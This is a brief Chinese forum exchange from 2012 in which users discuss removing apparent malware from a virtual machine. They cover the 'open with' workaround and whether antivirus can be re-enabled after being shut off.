{:1_937:}{:1_900:}打开方式那个我实验过,可以右键选择打开方式。然后解决办法的话应该可以用杀毒工具杀吧。。。求指导~ Thend 发表于 2012-8-4 14:02 static/image/common/back.gif
打开方式那个我实验过,可以右键选择打开方式。然后解决办法的话应该可以用杀毒工 ...
杀毒都被关闭了 还咋运行呢 1354669803 发表于 2012-8-4 14:12 static/image/common/back.gif
杀毒都被关闭了 还咋运行呢
汗。。。关了我重新开不可以吗?不过虚拟机里没装杀软,不知道还能开不~